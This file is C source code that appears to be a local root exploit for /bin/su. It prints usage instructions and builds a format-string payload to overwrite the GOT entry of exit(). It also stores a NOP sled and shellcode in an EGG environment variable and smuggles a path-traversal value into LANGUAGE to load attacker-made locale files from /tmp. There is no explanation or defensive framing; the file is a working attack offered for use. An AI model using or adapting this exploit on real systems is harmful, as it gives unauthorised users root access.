
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int FILENAME ;
 int THE_MEANING_OF_LIFE_THE_UNIVERSE_AND_EVERYTHING ;
 unsigned int atoi (char*) ;
 char* createDString (unsigned int,unsigned int) ;
 int execl (int ,char*,char*,char*,int *) ;
 int exit (int ) ;
 unsigned long getGOT (int ,char*) ;
 char* hellcode ;
 char* longToChar (unsigned long) ;
 int makeEvilFiles (char*) ;
 scalar_t__ mayRead (int ) ;
 int printf (char*,...) ;
 char* strcreat (char*,char*,int) ;
 char* strdup (char*) ;
 unsigned int strtoul (char*,int *,int) ;

int main(int argc, char **argv, char **environ)
{
   unsigned long GOTent;
   char *evilstring, *evilfmt, *payload;
   unsigned int x_num, align=0, retaddy=0xbffffe90;

   if(argc==1) {
      printf("Use as: %s <Number of %%.8x> [align] [ret addy]\n", argv[0]);
      exit(0);
   }

   if(mayRead(FILENAME)) {
      printf("/bin/su is readable - using a GOT overwrite...\n");
      GOTent=getGOT(FILENAME, "exit");
      printf("GOT entry of function exit() at: 0x%lx\n", GOTent);
   } else {
      printf("/bin/su is unreadable - overwriting a return address...\n");
      printf("Not implemented yet... Exiting\n");
      exit(0);
   }

   x_num=atoi(argv[THE_MEANING_OF_LIFE_THE_UNIVERSE_AND_EVERYTHING-41]);
   if(argv[2]) align=atoi(argv[2]);
   if(argv[3]) retaddy=strtoul(argv[3], ((void*)0), 16);

   printf("Using %d %%.8x\n", x_num);
   printf("Using retaddy: 0x%x\n", retaddy);
   printf("Using alignment: %d\n", align);


   evilstring=strcreat(((void*)0), "A", align);

   evilstring=strcreat(evilstring, longToChar(GOTent+2), 1);

   evilstring=strcreat(evilstring, "A", 4);

   evilstring=strcreat(evilstring, longToChar(GOTent), 1);

   evilstring=strcreat(evilstring, "A", align);

   evilfmt=strcreat(((void*)0), "%.8x", x_num);

   evilfmt=strcreat(evilfmt, createDString(retaddy, x_num*8), 1);


   payload=strcreat(((void*)0), "EGG=", 1);
   payload=strcreat(payload, "\x90", 500);
   payload=strcreat(payload, hellcode, 1);

   makeEvilFiles(evilfmt);



   environ[0] = strdup("LANGUAGE=sk_SK/../../../../../../tmp");
   environ[1] = payload;
   environ[2] = ((void*)0);

   execl(FILENAME, "Look mommy, I'm a kiddo!", "-u", evilstring, ((void*)0));

   return(0);
}
